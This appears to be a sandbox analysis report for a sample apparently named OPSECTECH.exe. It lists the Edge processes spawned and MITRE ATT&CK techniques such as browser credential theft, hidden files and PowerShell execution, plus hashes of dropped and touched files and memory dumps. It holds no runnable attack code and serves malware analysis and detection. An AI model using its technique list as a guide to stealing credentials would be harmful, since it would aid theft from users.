"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault94cf9cb2hca61h49e9hb478hbc826146dee1
1⤵
PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdf2fd46f8,0x7ffdf2fd4708,0x7ffdf2fd4718
  2⤵
  PID:5872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,15033967839508341808,6843957686714933347,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,15033967839508341808,6843957686714933347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,15033967839508341808,6843957686714933347,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
  2⤵
  PID:4052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
5f185933fc78dd6ed7ba7c04a97bec2f

SHA1
d94eb19c5f7114bdacb5cec91a6a3a3cda88c25d

SHA256
9ba5b942ee6fa8f21952fea9e83c186cdf51317286503b0ef0c41ea7b6dd6ae8

SHA512
b83a2f1cb299ea1d52ef7accfdfa4add37d015730592894c9acd88d4854a852129256ed2a1910890ef8379a3dd49aaf2e9d04ec8544b0fd25aaf410aef13b6b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
d1f2c39e2880fd22d129b2006e09d123

SHA1
092164f5ba927f3bc6ddb0457a82092be138355e

SHA256
9e2dd96e55f507dc159fdb66f6b18d4d5a1c07156025137bb74a319758844dcf

SHA512
b87e73deaef8a60530d08e4d68e0727af6c0e2e2467f8053a2153bc00d1f10aea6bc18214395723a1f9f66bd9bcfcffff99f06acb0032da0976211375a12b78b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
1KB

MD5
388a33761d69fa769ac5c08657c5f067

SHA1
a2741dda3cad9772c17ba4082e59fc9e9288d580

SHA256
83695c6b11628cecec9d56411f2f3b0bb76a7899298d795cfb18bff22021ff73

SHA512
976d95d5b99c73236f68729be5b324a67353a666c580aa51e31f0ba61c306ae942eb172194b58e19fadebec3b9958550b6449c2b4dd9e8e6bd0607d3a09f207c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
179fb23b784301d5d25eac41dd25dafd

SHA1
9d7dd25750d8409f1b368676310f478c4f8ccc31

SHA256
d8f72534a37a5a2552a589db856cc38fcf0843721340b73272a1a1a8f67dfd7e

SHA512
a058c3fe49458dc12db400c607eb10001b847b36f5413a4019a98228a09d68fafdb641b830482dedc4c6035e43b097adc5f96f8bc62585676aa9fb7fedb31916

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
208b76cdc187eb93a02a30f903a11e45

SHA1
86f3c030075f59346929cbb2eded585062208bd7

SHA256
fd8e31eaa4c553a9012e64bbdc031a718362e8f760049f71558dfd198eb73fb6

SHA512
a37e41069ac6aa8abd665a7104ab0d603606f928310a57b2f67d914e5a600fe73628e8f465a104d27790303ff233df717f03ad8b8ecf701cb6babc5f21accb12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
323ffe77c41e20f7eb470ac12c583b43

SHA1
9582ea8e79d737a380aaebf449535e6ff7c187b5

SHA256
f6763af170b62eb16bfb7c439f93fea30445803ba8a101dde60733ce5b186fa5

SHA512
f7b0177a47815684fedffdbef98adc0738ae1b946478d1ea137a801a1a930cc9bb9c2c1aae545f561f2fa57330b410011fd0858e0f2dcc20951fc6335787e3d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
707fd8dcb9058055ff06b0919ff032bd

SHA1
d7c457bc26017aac7dcea26d38a1e6b759072ac3

SHA256
840d59d9fbd547edbe788c97c84ed3223d3e44d86c798880a76f209cbb9db81e

SHA512
98d704a604000f8673512f479289d72af49054bc88beaff1864a5f7d706e592219f89c22478b9d76450cd0df417c1fea94e08a29532cdee387d5dfe9e8b1db7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a776f5633a3604ccd2d5fd984cbc7b62

SHA1
d6db0d06e5ba36e0ebec94afe7b5b9452766bb72

SHA256
0292e2db652b5a591300b897a63b2dab7f08476fb9e1dd1b5bc888d064d831ed

SHA512
249be81aaf5259f5d6cc72133d9d2d871763573a0420b5818b7d6e9b7c8b30715177a826171ed927863cab2fe1486453a8a65dac21303abdb3ae4b4b50718020

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2369624773178afffeb12bdaf4019338

SHA1
eedeb811b5419484c4b548365c6d47a32e6753fd

SHA256
41589c4303085cbfb6faa6f9a0587afff8050a44f343c0341743601103a9b8ce

SHA512
77a42c419a7eb1fe44cbd80a022690881359b4be1a9da7b08b52294bc05fa11ad5fe09945e22bca8427acbd98dc3e2b0b8adb9c17f3a58729d549047bc784341

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c99533565a344a3460c215763974d583

SHA1
5187d28835a24215173e064d0a62198a0a4c2d4b

SHA256
7765b7b69db3c6c1e1bcfe3553f145c8286344bc5bd7b5ae82a8513e24df9e5c

SHA512
bf84dd11eab4d7055bda570e8643a37f4376e5daed0c2697a074a33bb04d91670d02145eb6410debae047b44ff1738bb006c966b0d4f5a8c48d63738d3bb471e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
198bebe814db19cf4899f260593d90af

SHA1
197f3f296e3d59b627d964a1958808dca9a4bf95

SHA256
6c26bf05ad2ab361e024014b37d368c8c0bc80a498e6445456e797d3320b146d

SHA512
eaab940dadd49d31f983e841158873ac4db3e389017ad7c20ae41e73b7d28bd349cbd3dab51947a5fba219d104661799eabf9081dcbdfdc2be8eaa1fe51335d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
5cbe26c5bcf652973203a728b9377db2

SHA1
8757b66430a92ee7398b9a73d5cedda69d98af83

SHA256
f11e7e5386114a4413a249e085a26493ce7676e6fdd90224390a24c250ac354c

SHA512
42563cc13f17afe6c308fe4db5a0f980bffd356b3da0867ef8897fcae858dbfb87c274c12be87d9e100409efdf878323e36529008962d890877e8a402c6ba05a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OPSECTECH.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
34d2c4f40f47672ecdf6f66fea242f4a

SHA1
4bcad62542aeb44cae38a907d8b5a8604115ada2

SHA256
b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33

SHA512
50fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7919aeeca73db573d29854d24528bff2

SHA1
9aacbdc516d59e56849bb2139538d9cb8162ba16

SHA256
adc683de4d4f68d224aed3599e894ddce3a574dd0dd7df009002a90164d24860

SHA512
afbe99aedeeddff3970a94bfa5f2813740625b59496e7b018a2f712925f85da6b6a72ae16d53d1a6c06d5c572b1b78f611f4ba1ff7ab4efcb2f72f1b61012bd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
9ab46e8206bf7f845c05e3e5eebd90e9

SHA1
18e7255802cdfe2b2c207e739653bf02196f722a

SHA256
81b79acf4236e0d9e3c85508692493809e9f8f5e09db370ccafdb75a552e9e84

SHA512
56165fb6c791568cd63e5914ddd872f1b261abfa2e9e971db3ded456f271463493ff867b8771fb21751d2d0a57637ccaa7b2af1e1a5d6ea763036ad79b46e72d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
47aec0ae6e0dfab5f91c35cd65d2c56a

SHA1
0bbe13618bdc0c402539cdfca81471aa501f5cad

SHA256
8f31385012b247db2cc50ecb164208fbbf5f8cdf7bfc951e8c2c8ad5fb04cf0b

SHA512
c4b7184a85c1d594012ba86390e651439d6cae63c76b94432faaaea410e4ef9bc62d88e68adf8f3abbe36e18ef9e4dc46c3e31a0d72089f98a22f04c8b4a8f12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4d5f16dff1c6c4bd78c48253f411da2

SHA1
0fb7366585572b2cf4144d169302ba21d8e71ac3

SHA256
360fe2bf9d46f0e6bb35c1b41ba0d70c5f10a1a9b42e29d9cafea37de5964133

SHA512
27cb84814bf84d0db623e68c06b6391e63d985d5fe77a9d6ca9093329fbe73da490bb9bef67fea667d2d03b1d42ed5b4591f9e72c281c15965d0765c019d4b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2f09af6f62f25caf95cfd456fa94adfb

SHA1
c97f0c8ac6fe1f9a20539321e99134966fe27e94

SHA256
1ef26d9bcce20b0c9977d5788b02d0953787e0488468a54699eec1325a77cdd4

SHA512
567cf6d9977e3e3ff3d470f11cb12660bca76aa5dc17d7ac0893f38aaa5ee00410cc6bb31a771df35087f70f75ea17c08782c4e8f8f51c89ff53470b696f6776

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9390b66cebc6c006ad29783078ac920b

SHA1
a61c048a788c8821ac024811fa693d2259499cf5

SHA256
a749a95d2101f05dfc26c1045f2d7324e1a8f30c7a1e13eed18ab5f9c2b73d3e

SHA512
65c2658215753f5d6de2affbb93ab15a62d6d9106b79e4c049cdeb885d52332825aa2d62eeb4f0b312eee3a4f01ede6f9e2caa10e12b269fe81178d878cc4cf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45ad40f012b09e141955482368549640

SHA1
3f9cd15875c1e397c3b2b5592805577ae88a96cb

SHA256
ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce

SHA512
3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
07d142044fb78e359c794180a9c6fdff

SHA1
8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e

SHA256
2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea

SHA512
356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7C0EjCENf0ybQmo

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\HnW1x6VqoTut7yJ

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TtBexBOPeuk6Q60

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nj3ydmue.4ng.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\OPSECTECH.exe

Filesize
491KB

MD5
1a8d19faa4ff9eb5b69ee77b3a267818

SHA1
c2b4c7fdd891f4c7eef6d48d530bc7d0fee2b70b

SHA256
4975012fe58168b1b6f479b52be3c3c2a197c46448178bdefcbc9553aff37abf

SHA512
8f1e3a8c3747cd34b561350d915d405678a8015bf4ff7a468f4fb568d80fe14f47e40a4ab77e7193b041b575557e7073e1403d12c02c7e6932ab71bbc5e41367

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/3000-127-0x0000023037BA0000-0x0000023037BBE000-memory.dmp

Filesize
120KB

Download
memory/3000-115-0x0000023037BD0000-0x0000023037C20000-memory.dmp

Filesize
320KB

Download
memory/3000-114-0x0000023050440000-0x00000230504B6000-memory.dmp

Filesize
472KB

Download
memory/3000-186-0x00007FFDF3100000-0x00007FFDF3BC1000-memory.dmp

Filesize
10.8MB

Download
memory/3000-160-0x0000023037C20000-0x0000023037C2A000-memory.dmp

Filesize
40KB

Download
memory/3000-86-0x00007FFDF3100000-0x00007FFDF3BC1000-memory.dmp

Filesize
10.8MB

Download
memory/3000-85-0x0000023035CB0000-0x0000023035D32000-memory.dmp

Filesize
520KB

Download
memory/3000-84-0x00007FFDF3103000-0x00007FFDF3105000-memory.dmp

Filesize
8KB

Download
memory/3000-161-0x00000230504F0000-0x0000023050502000-memory.dmp

Filesize
72KB

Download
memory/3808-87-0x000001C92B830000-0x000001C92B852000-memory.dmp

Filesize
136KB

Download